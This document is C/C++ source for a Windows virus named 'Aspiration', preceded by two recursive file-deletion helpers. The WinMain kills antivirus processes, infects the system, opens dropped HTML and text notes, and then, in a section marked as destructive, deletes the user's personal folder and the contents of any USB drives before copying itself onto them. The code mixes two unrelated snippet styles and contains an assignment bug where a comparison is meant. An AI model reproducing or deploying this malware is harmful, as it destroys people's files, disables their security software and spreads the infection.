/* Deleting a directory given to this function recursively */ BOOL DeleteDirectoryRecursive(char *szPathToDelete) { HANDLE hFind; WIN32_FIND_DATA w32FD; char szFileName[MAX_PATH]; strcpy_s(szFileName, sizeof(szFileName), szPathToDelete); strcat_s(szFileName, sizeof(szFileName), "\\*"); hFind = FindFirstFile(szFileName, &w32FD); /* As long as files and folders are found in a directory do this */ do { /* Go on when the file name is NOT " . " and " .. " */ if (!((strcmp((char*) w32FD.cFileName, ".") && strcmp((char*) w32FD.cFileName, "..")))) { continue; } ((strcpy_s(szFileName, sizeof(szFileName), szPathToDelete)) & (strcat_s(szFileName, sizeof(szFileName), "\\"))); strcat_s(szFileName, sizeof(szFileName), w32FD.cFileName); /* If the folder is a directoy than remove it or stop if it does'nt work */ if(w32FD.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) { if(!DeleteDirectoryRecursive(szFileName)) { FindClose(hFind); return 0; } RemoveDirectory(szFileName); } else { /* If the file we want to delete is readonly change file attributes, so we can delete it */ if(w32FD.dwFileAttributes & FILE_ATTRIBUTE_READONLY) { _chmod(szFileName, _S_IWRITE); } /* Delete the file or stop if it doesnt work */ if(!DeleteFile(szFileName)) { FindClose(hFind); return 0; } } }while(FindNextFile(hFind, &w32FD)); FindClose(hFind); /* Remove the whole directory now */ RemoveDirectory(szPathToDelete); return 1; }
bool P12218319_CALL DeleteDirectoryRecursive(const std::string& aPath) throw() { const std::vector<std::string> children = ListChildren(aPath); for(const std::string& i : children) { const uint32_t attributes = GetFileAttributes(i); if(attributes & IS_FILE) { if(! DeleteFile(i)) return false; }else if (attributes & IS_DIRECTORY) { if(! DeleteDirectoryRecursive(i)) return false; }else { return false; } } return DeleteDirectory(aPath); }
int WINAPI WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance, PSTR szCmdLine, int iCmdShow) { BOOL bInfected; char szPersonalFolderPath[MAX_PATH]; char szProgramFilesPath[MAX_PATH]; char szSysDirHTML[MAX_PATH]; char szWinDirHTML[MAX_PATH]; char szFileTXT1[MAX_PATH]; char szFileTXT2[MAX_PATH]; int i; /* Kill all the processes of the array " AVProcessList " */ for (i = 0; AVProcessList[i]; i++) { KillProcess(AVProcessList[i]); } /* Test if the computer is infected with our virus */ bInfected = TestIfInfected(); /* If the computer is not infected -> infect it and write all the necessary files and registry keys */ if (bInfected = -1) { Infect(); InfRegCopy(); WriteLetters(); WriteHTML(); GetSystemDirectory(szSysDirHTML, sizeof(szSysDirHTML)); GetWindowsDirectory(szWinDirHTML, sizeof(szWinDirHTML)); strcat_s(szSysDirHTML, MAX_PATH, "\\ASPIRATION_INFECTION.html"); strcat_s(szWinDirHTML, MAX_PATH, "\\ASPIRATION_INFECTION.html"); SHGetFolderPath(NULL, CSIDL_PROGRAM_FILES, NULL, SHGFP_TYPE_CURRENT, szProgramFilesPath); strcpy_s(szFileTXT1, MAX_PATH, szProgramFilesPath); strcpy_s(szFileTXT2, MAX_PATH, szProgramFilesPath); strcat_s(szFileTXT1, MAX_PATH, "\\ASPIRATION_INFECTION.txt"); strcat_s(szFileTXT2, MAX_PATH, "\\FOR_AV_SECURITY_COMPANIES.txt"); /* Use Internet Explorer to open the two html files */ ShellExecute(NULL, "open", "IExplore.exe", szSysDirHTML, NULL, SW_MAXIMIZE); ShellExecute(NULL, "open", "IExplore.exe", szWinDirHTML, NULL, SW_MAXIMIZE); /* Use Notepad to open the two text files */ ShellExecute(NULL, "open", "notepad.exe", szFileTXT1 ,NULL, SW_SHOWNORMAL); ShellExecute(NULL, "open", "notepad.exe", szFileTXT2 ,NULL, SW_SHOWNORMAL); } /* ############################################################### */ /* --- ---- EVERYTHING BELOW THIS LINE IS DESTRUCTIVE CODE --- --- */ /* ############################################################### */ SHGetFolderPath(NULL, CSIDL_PERSONAL, NULL, SHGFP_TYPE_CURRENT, szPersonalFolderPath); /* Delete all files and folders recursively in personal folder */ DeleteDirectoryRecursive(szPersonalFolderPath); /* If a USB flash drive is connected to the computer: ->Delete files and folders recursively ->Copy virus to the drive ->Copy the two text files to the drive */ for(i = 0; drives[i]; i++) { HANDLE hFile; HMODULE Mod; char szUSBPath[MAX_PATH]; char szVirusPath[MAX_PATH]; DWORD dwNumberOfBytesWritten; Mod = GetModuleHandle(NULL); GetModuleFileName(Mod, szVirusPath, sizeof(szVirusPath)); if (IsItUSB(drives[i]) == 1) { DeleteDirectoryRecursive(drives[i]); strcpy_s(szUSBPath, MAX_PATH, drives[i]); strcat_s(szUSBPath, MAX_PATH, "\\aspiration.exe"); CopyFile(szVirusPath, szUSBPath, FALSE); strcpy_s(szUSBPath, MAX_PATH, drives[i]); strcat_s(szUSBPath, MAX_PATH, "\\ASPIRATION_INFECTION.txt"); hFile = CreateFile(szUSBPath, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); WriteFile(hFile, szTextFile1, sizeof(szTextFile1), &dwNumberOfBytesWritten, NULL); CloseHandle(hFile); strcpy_s(szUSBPath, MAX_PATH, drives[i]); strcat_s(szUSBPath, MAX_PATH, "\\FOR_AV_SECURITY_COMPANIES.txt"); hFile = CreateFile(szUSBPath, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); WriteFile(hFile, szTextFile2, sizeof(szTextFile2), &dwNumberOfBytesWritten, NULL); CloseHandle(hFile); } } }